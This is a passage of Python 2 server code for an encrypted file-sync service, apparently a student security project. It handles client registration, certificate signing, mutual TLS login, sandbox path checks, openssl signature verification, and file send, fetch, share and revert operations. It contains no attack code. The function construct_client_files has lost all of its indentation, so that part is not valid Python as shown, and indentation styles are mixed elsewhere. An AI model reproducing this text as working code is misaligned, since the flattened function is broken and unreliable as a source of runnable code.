    base = os.path.abspath(highestlevel_dirname)
    return real_suspect == base or real_suspect.startswith(base + os.sep)
def sandbox_escaped(currentside_filepath, currentside_dirname, conn, client_name):
    """Check a client-supplied path against its sandbox directory.

    Returns True (after sending 'NOK' to the client) when the path
    escapes *currentside_dirname*; False when access is allowed.
    """
    if not path_traversal_verified(currentside_filepath, currentside_dirname):
        #print currentside_filepath
        #print currentside_dirname
        print "[!][" + now() + "] Client %s just tried to escape his directory." %(client_name)
        conn = server_send_nok(conn, client_name)
        return True
    return False
def fetch_files_dirs(serverside_path, clientside_path, client_name, sharedfile_username=""):
    """Build the file structure for a fetch request.

    If *serverside_path* is a directory, export the whole tree.
    Otherwise the triplet <name>.encrypted, <name>.key.encrypted[.<user>]
    and <name>.sig must all exist next to it.  Returns (file_structure,
    ok); ok is False when any of the three files is missing, in which
    case the caller should drop the client.
    """
    serverside_directory = os.path.dirname(serverside_path)
    clientside_directory = os.path.dirname(clientside_path)
    file_structure = dict()
    if os.path.isdir(serverside_path):
        file_structure = fs_server2client(serverside_path, clientside_path, True, sharedfile_username)
    else:
        file_structure[clientside_directory] = dict()
        file_filename = os.path.basename(clientside_path) + ".encrypted"
        # a shared file's key is stored with the sharing user's name appended
        key_filename = os.path.basename(clientside_path) + ".key.encrypted" if not sharedfile_username else os.path.basename(clientside_path) + ".key.encrypted." + sharedfile_username
        sig_filename = os.path.basename(clientside_path) + ".sig"
        serverside_filepath = serverside_directory + os.sep + file_filename
        serverside_keypath = serverside_directory + os.sep + key_filename
        serverside_sigpath = serverside_directory + os.sep + sig_filename
        if os.path.isfile(serverside_filepath) and os.path.isfile(serverside_keypath) and os.path.isfile(serverside_sigpath):
            file_structure = file_server2client(serverside_filepath, clientside_directory, file_filename, file_structure, True, sharedfile_username)
            file_structure = file_server2client(serverside_keypath, clientside_directory, key_filename, file_structure, True, sharedfile_username)
            file_structure = file_server2client(serverside_sigpath, clientside_directory, sig_filename, file_structure, True, sharedfile_username)
        else:
            print "[!][" + now() + "] Client %s is trying to fetch a non-existent file. Cutting connection off..." %(client_name)
            return file_structure, False # bye client
    return file_structure, True
def read_in_chunks(conn, client_name):
 """Receive one length-prefixed JSON message from *conn*.

 Protocol: the peer first sends the payload length as a decimal string,
 then the JSON payload, which is read in chunks of at most 16 KiB.
 Returns (conn, decoded_object) on success or (conn, False) on a malformed
 length prefix / protocol violation (the caller then drops the client).
 """
 # handle unexpected data
 try:
  data_len = int(conn.read())
 except ValueError:
  print("[!][" + now() + "] Client %s tried to send me a string that does not correspond to an integer. Cutting off connection..." %(client_name))
  return conn, False # bye client
 if data_len <= 0:
  # BUGFIX: a zero (or negative) announced length previously made
  # chunk_len 0, so "i += chunk_len" never advanced and the recv loop
  # span forever; treat it as a protocol violation instead
  return conn, False # bye client
 chunk_len = min(data_len, 16384) # limit size before waiting
 data_repr = ""
 received = 0
 while received < data_len:
  # recv() may legally return fewer bytes than requested, so count what
  # actually arrived instead of assuming full chunks
  chunk = conn.recv(min(chunk_len, data_len - received))
  if not chunk:
   # peer closed the connection before sending the whole payload
   return conn, False # bye client
  data_repr += chunk
  received += len(chunk)
 data = json.loads(data_repr)
 return conn, data
def send_in_chunks(conn, data):
 """Serialize *data* as JSON and send it over *conn*, preceded by the
 payload length (as a decimal string) so the peer knows how much to read."""
 payload = json.dumps(data)
 conn.send(str(len(payload)))
 conn.send(payload)
 return conn
def get_user_cert_content(username):
 """Return the PEM contents of the signed certificate stored for *username*."""
 cert_path = server_global.client_certificates_dir + os.sep + username + ".crt"
 with open(cert_path) as cert_file:
  return cert_file.read()
def verify_digital_signature(pubkey_path,sig_filepath,cryptogram_filepath):
 """Verify a detached SHA-256 signature with the openssl CLI.

 Returns True iff openssl reports "Verified OK" for *cryptogram_filepath*
 against *sig_filepath* under the public key at *pubkey_path*.
 """
 # BUGFIX: pass an argument list instead of building one string and
 # split()ing it, so paths containing whitespace no longer shatter into
 # separate arguments
 cmd = ["openssl", "dgst", "-sha256", "-verify", pubkey_path,
        "-signature", sig_filepath, cryptogram_filepath]
 proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
 sig_verification = proc.stdout.read()
 proc.wait() # reap the child so no zombie process lingers
 return sig_verification=="Verified OK\n"
def write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path):
 """Decode the hex-encoded signature, persist it as ".sig" beside both the
 live file and its backup, then verify it against the cryptogram using the
 client's public key. Returns the boolean verification result."""
 signature = signature_bytecode.decode("hex")
 sig_filepath = serverside_filepath + ".sig"
 sig_backup_filepath = backup_filepath + ".sig"
 # identical bytes go to the live location and to the backup twin
 for destination in (sig_filepath, sig_backup_filepath):
  handle = open(destination, "w")
  handle.write(signature)
  handle.close()
 return verify_digital_signature(pubkey_path, sig_filepath, cryptogram_filepath)
def construct_client_files(conn, client_name, serverside_dirname, backup_dirname, clientside_dirname, sharedfiles_tag, file_structure):
pubkey_path = "clients" + os.sep + "client_certs" + os.sep + client_name + ".pubkey"
for clientside_directory in file_structure:
serverside_directory = clientside_directory.replace(clientside_dirname,serverside_dirname, 1) # replace only first occurence
backup_directory = clientside_directory.replace(clientside_dirname,backup_dirname, 1) # replace only first occurence
if sandbox_escaped(serverside_directory, serverside_dirname, conn, client_name):
return conn, False # bye client
mkdir_p(serverside_directory)
for filename in file_structure[clientside_directory]:
serverside_filepath = serverside_directory + os.sep + filename
backup_filepath = backup_directory + os.sep + filename
if sandbox_escaped(serverside_filepath, serverside_dirname, conn, client_name):
return conn, False # bye client
encrypted_filecontent_bytecode = file_structure[clientside_directory][filename][0]
encrypted_filecontent = encrypted_filecontent_bytecode.decode("hex")
cryptogram_filepath = serverside_filepath + ".encrypted"
cryptogram_backup_filepath = backup_filepath + ".encrypted"
file_exists = os.path.exists(cryptogram_filepath)
if sharedfiles_tag:
clientside_writetime = file_structure[clientside_directory][filename][2]
serverside_writetime = os.path.getmtime(cryptogram_filepath) if file_exists else 0
if clientside_writetime >= serverside_writetime:
mkdir_p(backup_directory) # only creates backup directory if a file in it has been altered
f = open(cryptogram_filepath, "w")
f.write(encrypted_filecontent)
f.close()
f = open(cryptogram_backup_filepath, "w")
f.write(encrypted_filecontent)
f.close()
signature_bytecode = file_structure[clientside_directory][filename][1]
sig_verified = write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path)
if not sig_verified:
print "[!][" + now() + "] Ciphered-file signature not verified: file \"%s\" wasn't signed by %s" %(cryptogram_filepath, client_name)
return conn, False # bye client
encrypted_aeskeys = file_structure[clientside_directory][filename][3:]
for aeskey_info in encrypted_aeskeys:
username = aeskey_info[0]
encrypted_aeskey_bytecode = aeskey_info[1]
encrypted_aeskey = encrypted_aeskey_bytecode.decode("hex")
f = open(serverside_filepath + ".key.encrypted." + username, "w")
f.write(encrypted_aeskey)
f.close()
f = open(backup_filepath + ".key.encrypted." + username, "w")
f.write(encrypted_aeskey)
f.close()
else:
clientside_writetime = file_structure[clientside_directory][filename][3]
serverside_writetime = os.path.getmtime(cryptogram_filepath) if file_exists else 0
if clientside_writetime >= serverside_writetime:
mkdir_p(backup_directory) # only creates backup directory if a file in it has been altered
f = open(cryptogram_filepath, "w")
f.write(encrypted_filecontent)
f.close()
f = open(cryptogram_backup_filepath, "w")
f.write(encrypted_filecontent)
f.close()
signature_bytecode = file_structure[clientside_directory][filename][2]
sig_verified = write_and_verify_signature(signature_bytecode, serverside_filepath, backup_filepath, cryptogram_filepath, pubkey_path)
if not sig_verified:
print "[!][" + now() + "] Ciphered-file signature not verified: file \"%s\" wasn't signed by %s" %(cryptogram_filepath, client_name)
return conn, False # bye client
encrypted_aeskey_bytecode = file_structure[clientside_directory][filename][1]
encrypted_aeskey = encrypted_aeskey_bytecode.decode("hex")
f = open(serverside_filepath + ".key.encrypted", "w")
f.write(encrypted_aeskey)
f.close()
f = open(backup_filepath + ".key.encrypted", "w")
f.write(encrypted_aeskey)
f.close()
return conn, True
def get_individual_backup_dirs(client_name):
 """Return this client's individual-backup directory names, sorted, with
 the leading "<client_name>@" prefix stripped from each entry."""
 prefix = server_global.individual_backup_files_dir + os.sep + client_name + "@"
 stripped_names = []
 for entry in sorted(os.listdir(server_global.individual_backup_files_dir)):
  entry_path = server_global.individual_backup_files_dir + os.sep + entry
  if prefix in entry_path:
   stripped_names.append(entry.split(client_name + "@", 1)[-1])
 return stripped_names
def get_shared_backup_dirs(client_name):
 """Return, sorted, the shared-backup directory names whose participant
 list (the "-"-separated segment before the "@") contains *client_name*."""
 matching_dirs = []
 for entry in sorted(os.listdir(server_global.shared_backup_files_dir)):
  participants = entry.split("@",1)[0].split("-")
  if client_name in participants:
   matching_dirs.append(entry)
 return matching_dirs
def delete_file_or_dir(path):
 """Remove *path* from disk: whole tree when it is a directory, a single
 unlink otherwise."""
 if not os.path.isdir(path):
  os.remove(path)
  return
 shutil.rmtree(path)
def empty_directory(path):
 """Delete every entry directly under *path*, keeping *path* itself."""
 for entry in glob.glob(os.path.join(path, '*')):
  # inlined delete_file_or_dir: recurse for directories, unlink for files
  if os.path.isdir(entry):
   shutil.rmtree(entry)
  else:
   os.remove(entry)
# NOTE: we assume the registration steps aren't compromised for real clients
# (see the report), although we already provide safeguards for such events.
# return values: (connection_socket, end_with_client, conn_tracker)
def interact_with_client(conn, data, client_ip, serving_port, conn_tracker):
 """Dispatch one protocol message *data* from a client and run that step.

 conn_tracker maps (client_ip, serving_port) -> progress list: the "HELLO"
 marker, then the announced client name, then "AUTHENTICATE" once mutual
 TLS succeeded; later commands use it to know who the peer is and whether
 he is logged in.
 Returns (connection_socket, keep_serving_flag, conn_tracker); a False
 keep_serving_flag tells the caller to drop the connection.
 """
 print "CONNECTION TRACKER: %s" %(conn_tracker)
 # ----------------------
 # CLIENT HELLO MESSAGE |
 # ----------------------
 if data=="HELLO":
  print "[+][" + now() + "] Client with ip %s is connected and trusts me. I'm serving him in port %s, using %s." %(client_ip, serving_port, conn.version())
  conn = server_send_ok(conn, client_ip)
  # CONN-TRACK
  conn_tracker[(client_ip, serving_port)] = [data]
  return conn, True, conn_tracker
 # ---------------------
 # CLIENT NAME MESSAGE |
 # ---------------------
 elif "NAME: " in data:
  client_name = data.replace("NAME: ","", 1)
  try:
   # CONN-TRACK
   conn_tracker[(client_ip, serving_port)].append(client_name)
  except KeyError:
   # no HELLO was recorded for this (ip, port): out-of-order protocol use
   print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No hello message..." %(client_ip, serving_port)
   conn = server_send_nok(conn, client_ip)
   return conn, False, conn_tracker # bye client
  if not client_name:
   print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No client name found..." %(client_ip, serving_port)
   conn = server_send_nok(conn, client_ip)
   return conn, False, conn_tracker # bye client
  # if client name has invalid characters, supposedly worked on the client-side, then the client is either removing client-side checks or
  # he was a victim of a man-in-the-middle attack (supposing our one-way TLS isn't secure enough, which is doubtful)
  verified_client_name = verify_clientname(client_name)
  if not verified_client_name:
   print "[!][" + now() + "] Client name is being tampered with, cutting off connection with ip %s in port %s..." %(client_ip, serving_port)
   conn = server_send_nok(conn, client_ip)
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client with ip %s, served in port %s, says his name is %s." %(client_ip, serving_port, client_name)
  # send client register status to client
  conn, registered_status = server_get_send_regstatus(conn, client_name, send=True)
  update_json_file(client_name, registered_status)
  return conn, True, conn_tracker
 # -----------------------------------------
 # CLIENT REGISTER AND CERTIFICATE SIGNING |
 # -----------------------------------------
 elif data=="REGISTER":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to register." %(client_name)
  # check registered status, if he is registered and we are here, then something fishy is going on
  # because either client-side checks have been surpassed or client name was changed on the fly.
  conn, registered = server_get_send_regstatus(conn, client_name, send=False)
  if registered:
   print "[!][" + now() + "] Client %s is already registered, cannot reregister, cutting off connection..." %(client_name)
   conn = server_send_nok(conn)
   return conn, False, conn_tracker # bye client
  # confirm signing request is following previous rules
  conn = server_send_ok(conn, client_name)
  # handle unexpected data
  try:
   cert_sign_request_len = int(conn.read())
  except ValueError:
   print "[!][" + now() + "] Client %s tried to send me a string that does not correspond to an integer. Cutting off connection..." %(client_name)
   return conn, False, conn_tracker # bye client
  client_csr = conn.recv(cert_sign_request_len)
  client_csr_path = server_global.client_certificates_dir + os.sep + client_name + ".csr"
  client_certificate_path = server_global.client_certificates_dir + os.sep + client_name + ".crt"
  crt_verified = server_sign_clientcert(client_csr_path, client_csr, client_name)
  if not crt_verified:
   return conn, False, conn_tracker # bye client
  # send this client his certificate
  server_send_clientcert(conn, client_certificate_path, client_name)
  # create this client's directory
  mkdir_p(server_global.individual_files_dir + os.sep + client_name)
  # setting registered_status to True
  update_json_file(client_name, True)
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # ----------------------------------------------------
 # CLIENT AUTHENTICATION AND MUTUAL-TLS (TWO-WAY TLS) |
 # ----------------------------------------------------
 elif data=="AUTHENTICATE":
  # from this moment on, the client shall have a certificate signed by the server, so we can
  # build a new SSLContext and tell it that we want to check our peer's (client) certificate
  # and its inherent CA validation, respectively through a challenge-response mechanism (to
  # prove the certificate is really of that client) and verifying the certificate's signer
  # against the given one by the client (the signer should be us, i.e., the certificate should
  # be "server.crt")
  # info: https://tools.ietf.org/html/rfc5929.html ('tls-unique' mode), read also about TLS renegotiation standards
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client who said his name is %s wants to login." %(client_name)
  # the purpose of this ssl wrapper is to authenticate the client to the server
  mutual_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
  # client auth: need to verify the client's given certificate was signed by our signing CA,
  # so load its path into the verifiable locations
  mutual_ssl_context.load_verify_locations("cli-signing-ca/sirs-cli-signing-ca.crt")
  # load necessary files to create a TLS connection (server certificate and private key)
  mutual_ssl_context.load_cert_chain(certfile="server/sirs-server.crt", keyfile="server/sirs-server.key")
  # we require a certificate from the client this time, signed by our server
  mutual_ssl_context.verify_mode = ssl.CERT_REQUIRED
  # hostname checking is off: identity is checked via the certificate subject below instead
  mutual_ssl_context.check_hostname = False
  print "[+][" + now() + "][M-TLS] Verifying if %s's certificate was indeed signed by us, i.e., by our client certificate signing CA." %(client_name)
  # instead of completely closing the connection now and starting a new one, simply rewrap the socket with our new SSL configuration
  # this will raise an Error if anything's wrong with the received certificate
  # try/except for the case of the client giving us a certificate that wasn't signed by us
  try:
   mutual_conn = mutual_ssl_context.wrap_socket(conn, server_side=True, do_handshake_on_connect=True)
  except ssl.SSLError as err:
   print "[!][" + now() + "] Client %s provided a certificate that wasn't signed by our certificate authority. Error: %s" %(client_name, repr(err))
   conn = server_send_nok(conn, client_name)
   return conn, False, conn_tracker # bye client
  except socket.error:
   print "[!][" + now() + "] Client %s tried to login without the correct private key." %(client_name)
   return conn, False, conn_tracker # bye client
  # issuer is verified already, so let's verify peer certificate subject to check if it matches our current client;
  # this is used as a protection against client-side tampering where the client sends us another client's certificate (that cannot be accepted)
  correct_subject_info = "Subject: C = PT, ST = Lisboa, L = Lisboa, O = " + client_name + ", CN = *." + client_name + ".org"
  client_cert = mutual_conn.getpeercert()
  client_cert_verified = verify_cert_subject(client_cert, correct_subject_info, client_name)
  if not client_cert_verified:
   # FUTURE-WORK: it would be nice if we could add this certificate to a revogation list, and also check it...
   # (no time for implementing CRLs and CRLs check in this project, unfortunately)
   print "[!][" + now() + "] Someone with a certificate signed by us is trying to start a session in the name of %s, but this certificate doesn't match the username. Certificate identity: '%s'" %(client_name,get_subject(client_cert))
   conn = server_send_nok(mutual_conn, client_name)
   return mutual_conn, False, conn_tracker # bye client
  conn = server_send_ok(mutual_conn, client_name)
  # CONN-TRACK
  conn_tracker[(client_ip, serving_port)].append(data)
  return mutual_conn, True, conn_tracker # authenticated session from now on
 # -------------------------
 # LIST SYNCHRONIZED FILES |
 # -------------------------
 elif data=="LIST-FILES":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to know what files he has synchronized with us (individual and shared)." %(client_name)
  serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
  clientside_individual_dirname = "myprivatefiles"
  individualfile_structure = fs_server2client(serverside_individual_dirname, clientside_individual_dirname, file_content_flag=False)
  conn = send_in_chunks(conn, individualfile_structure)
  # shared directories are named "<creator>-<sharee>-...@...": pick those this client belongs to
  creator_sharees_list = []
  for shared_directory in os.listdir(server_global.shared_files_dir):
   if client_name in shared_directory.split("-"):
    creator_sharees_list.append(shared_directory)
  sharedfile_structure_list = []
  for creator_sharees_repr in creator_sharees_list:
   serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
   clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
   sharedfile_structure = fs_server2client(serverside_shared_dirname, clientside_shared_dirname, file_content_flag=False)
   # remove other clients encrypted AES keys
   for shared_directory in sharedfile_structure:
    sharedfiles_list = sharedfile_structure[shared_directory].keys()
    for sharedfile in sharedfiles_list:
     if sharedfile.endswith(".key.encrypted." + client_name):
      continue
     elif sharedfile.endswith(".encrypted"):
      continue
     else:
      sharedfile_structure[shared_directory].pop(sharedfile)
   sharedfile_structure_list.append(sharedfile_structure)
  conn = send_in_chunks(conn, sharedfile_structure_list)
  return conn, True, conn_tracker # continue connection, this action can be performed in conjunction with others
 # ----------------
 # LIST ALL USERS |
 # ----------------
 elif data=="LIST-ALL-USERS":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  registered_client_names = []
  for elem_name in server_global.clients_info:
   registered_client = server_get_send_regstatus(conn, elem_name, send=False)[1]
   if registered_client:
    registered_client_names.append(elem_name)
  conn = send_in_chunks(conn, registered_client_names)
  return conn, True, conn_tracker
 # -----------------------------------------
 # SEND (FILE-FLOW: FROM CLIENT TO SERVER) |
 # -----------------------------------------
 elif data=="SEND":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to send private files." %(client_name)
  conn, individualfile_structure = read_in_chunks(conn, client_name)
  if not individualfile_structure:
   return conn, False, conn_tracker # bye client
  # create individual files server-side
  serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
  backup_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_name + "@" + now()
  clientside_individual_dirname = "myprivatefiles"
  conn, sandbox_ok = construct_client_files(conn, client_name, serverside_individual_dirname, backup_individual_dirname, \
   clientside_individual_dirname, False, individualfile_structure)
  if not sandbox_ok:
   return conn, False, conn_tracker # bye client
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # ------------------------------------------
 # FETCH (FILE-FLOW: FROM SERVER TO CLIENT) |
 # ------------------------------------------
 elif data=="FETCH":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to fetch a private file or directory." %(client_name)
  serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
  clientside_individual_dirname = "myprivatefiles"
  input_path = conn.read()
  # handle unexpected data
  try:
   local_path = input_path.split(clientside_individual_dirname, 1)[1].lstrip(os.sep)
  except IndexError:
   print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
   return conn, False, conn_tracker
  clientside_path = clientside_individual_dirname + os.sep + local_path
  serverside_path = serverside_individual_dirname + os.sep + local_path
  individualfile_structure, good_output = fetch_files_dirs(serverside_path, clientside_path, client_name)
  if not good_output:
   return conn, False, conn_tracker # bye client
  conn = send_in_chunks(conn, individualfile_structure)
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # ----------------------------------------------
 # SHARE (FILE-FLOW: FROM CLIENT TO SERVER) |
 # ----------------------------------------------
 elif data=="SHARE":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  conn, share_info = read_in_chunks(conn, client_name)
  if not share_info:
   return conn, False, conn_tracker # bye client
  # share_info: [path, [sharee, ...]] — the creator is always the first user
  share_path = share_info[0]
  share_users = [client_name] + share_info[1]
  user_certs = dict()
  creator_sharees_repr = ""
  for username in share_users:
   user_cert = get_user_cert_content(username)
   user_certs[username] = user_cert
   creator_sharees_repr += username + "-"
  creator_sharees_repr = creator_sharees_repr.rstrip("-")
  conn = send_in_chunks(conn, user_certs)
  conn, sharedfile_structure = read_in_chunks(conn, client_name)
  if not sharedfile_structure:
   return conn, False, conn_tracker # bye client
  # create shared files server-side
  serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
  backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + creator_sharees_repr + "@" + now()
  clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
  conn, sandbox_ok = construct_client_files(conn, client_name, serverside_shared_dirname, backup_shared_dirname, \
   clientside_shared_dirname, True, sharedfile_structure)
  if not sandbox_ok:
   return conn, False, conn_tracker # bye client
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # -----------------------------------------------------
 # FETCH-SHARED (FILE-FLOW: FROM CLIENT TO SERVER) |
 # -----------------------------------------------------
 elif data=="FETCH-SHARED":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to fetch a shared file or directory." %(client_name)
  input_path = conn.read()
  try:
   local_path = input_path.split("mysharedfiles", 1)[1].lstrip(os.sep)
  except IndexError:
   print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
   return conn, False, conn_tracker # bye client
  # only honor the request if the named share directory exists and includes this client
  creator_sharees_repr = ""
  for shared_directory in os.listdir(server_global.shared_files_dir):
   input_creator_sharees_repr = local_path.split(os.sep, 1)[0]
   if client_name in shared_directory.split("-") and shared_directory==input_creator_sharees_repr:
    creator_sharees_repr = shared_directory
    break
  if not creator_sharees_repr:
   print "[!][" + now() + "] Client %s didn't send a correct share-directory. Cutting connection off..." %(client_name)
   return conn, False, conn_tracker # bye client
  serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
  clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
  # handle unexpected data
  try:
   local_path = input_path.split(clientside_shared_dirname, 1)[1].lstrip(os.sep)
  except IndexError:
   print "[!][" + now() + "] Client %s sent an unexpected message. Cutting connection off..." %(client_name)
   return conn, False, conn_tracker # bye client
  clientside_path = (clientside_shared_dirname + os.sep + local_path).rstrip(os.sep)
  serverside_path = (serverside_shared_dirname + os.sep + local_path).rstrip(os.sep)
  sharedfile_structure, good_output = fetch_files_dirs(serverside_path, clientside_path, client_name, sharedfile_username=client_name)
  if not good_output:
   return conn, False, conn_tracker # bye client
  conn = send_in_chunks(conn, sharedfile_structure)
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # -------------------------------------------------------
 # SEND-SHARED (FILE-FLOW: FROM CLIENT TO SERVER) |
 # -------------------------------------------------------
 elif data=="SEND-SHARED":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to send a shared file or directory." %(client_name)
  conn, share_info = read_in_chunks(conn, client_name)
  if not share_info:
   return conn, False, conn_tracker # bye client
  share_path = share_info[0]
  share_users = [client_name] + share_info[1]
  user_certs = dict()
  creator_sharees_repr = ""
  for username in share_users:
   user_cert = get_user_cert_content(username)
   user_certs[username] = user_cert
   creator_sharees_repr += username + "-"
  creator_sharees_repr = creator_sharees_repr.rstrip("-")
  conn = send_in_chunks(conn, user_certs)
  conn, sharedfile_structure = read_in_chunks(conn, client_name)
  if not sharedfile_structure:
   return conn, False, conn_tracker # bye client
  # example filepath
  input_creator_sharees_repr = sharedfile_structure.keys()[0].split(os.sep)[1]
  creator_sharees_repr = ""
  for shared_directory in os.listdir(server_global.shared_files_dir):
   if client_name in shared_directory.split("-") and shared_directory==input_creator_sharees_repr:
    creator_sharees_repr = shared_directory
    break
  if not creator_sharees_repr:
   print "[!][" + now() + "] Client %s didn't send a correct share-directory. Cutting connection off..." %(client_name)
   return conn, False, conn_tracker # bye client
  # create individual files server-side
  serverside_shared_dirname = server_global.shared_files_dir + os.sep + creator_sharees_repr
  backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + creator_sharees_repr + "@" + now()
  clientside_shared_dirname = "mysharedfiles" + os.sep + creator_sharees_repr
  conn, sandbox_ok = construct_client_files(conn, client_name, serverside_shared_dirname, backup_shared_dirname, \
   clientside_shared_dirname, True, sharedfile_structure)
  if not sandbox_ok:
   return conn, False, conn_tracker # bye client
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # --------------------------------------------------
 # LIST CLIENT'S INDIVIDUAL AND SHARED BACKUP FILES |
 # --------------------------------------------------
 elif data=="LIST-MY-BACKUPS":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to know every directory we have backed up so far." %(client_name)
  individual_backup_dirs = get_individual_backup_dirs(client_name)
  shared_backup_dirs = get_shared_backup_dirs(client_name)
  conn = send_in_chunks(conn, individual_backup_dirs)
  conn = send_in_chunks(conn, shared_backup_dirs)
  return conn, True, conn_tracker # continue connection, this action can be performed in conjunction with others
 # -------------------------------------------
 # REVERT (FILE-FLOW: FROM SERVER TO CLIENT) |
 # -------------------------------------------
 elif data=="REVERT":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to revert his local files to another point in time." %(client_name)
  conn, chosen_backup_directory = read_in_chunks(conn, client_name)
  serverside_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_name + "@"
  all_backup_dirs = sorted(os.listdir(server_global.individual_backup_files_dir))
  client_backup_dirs = []
  # newest first: collect this client's backups from the most recent backwards
  for client_backup in reversed(all_backup_dirs):
   server_backup_file = server_global.individual_backup_files_dir + os.sep + client_backup
   if serverside_individual_dirname in server_backup_file:
    client_backup_dirs.append(client_backup)
  # every backup from now back to (and including) the chosen checkpoint must be replayed
  restore_list = []
  checkpoint_found_flag = False
  for client_backup_directory in client_backup_dirs:
   print client_backup_directory
   print (client_name + "@" + chosen_backup_directory)
   restore_list.append(client_backup_directory)
   if (client_name + "@" + chosen_backup_directory)==client_backup_directory:
    checkpoint_found_flag = True
    break
  if not checkpoint_found_flag:
   print "[!][" + now() + "] The checkpoint client %s sent us isn't available. This shouldn't be possible if the client doesn't tamper with the client application" %(client_name)
   return conn, False, conn_tracker # bye client
  clientside_individual_dirname = "myprivatefiles"
  serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
  file_structure_list = []
  for client_backup_directory in restore_list:
   backup_individual_dirname = server_global.individual_backup_files_dir + os.sep + client_backup_directory
   file_structure = fs_server2client(backup_individual_dirname, clientside_individual_dirname)
   file_structure_list.append(file_structure)
  conn = send_in_chunks(conn, file_structure_list)
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # --------------------------------------------------
 # REVERT-SHARED (FILE-FLOW: FROM SERVER TO CLIENT) |
 # --------------------------------------------------
 elif data=="REVERT-SHARED":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to revert his local files to another point in time." %(client_name)
  conn, chosen_backup_directory = read_in_chunks(conn, client_name)
  client_names_list = chosen_backup_directory.split("@",1)[0].split("-")
  client_names_repr = "-".join(client_names_list)
  shared_backup_dirs = reversed(sorted(get_shared_backup_dirs(client_name)))
  restore_list = []
  checkpoint_found_flag = False
  for shared_backup_directory in shared_backup_dirs:
   restore_list.append(shared_backup_directory)
   if chosen_backup_directory==shared_backup_directory:
    checkpoint_found_flag = True
    break
  if not checkpoint_found_flag:
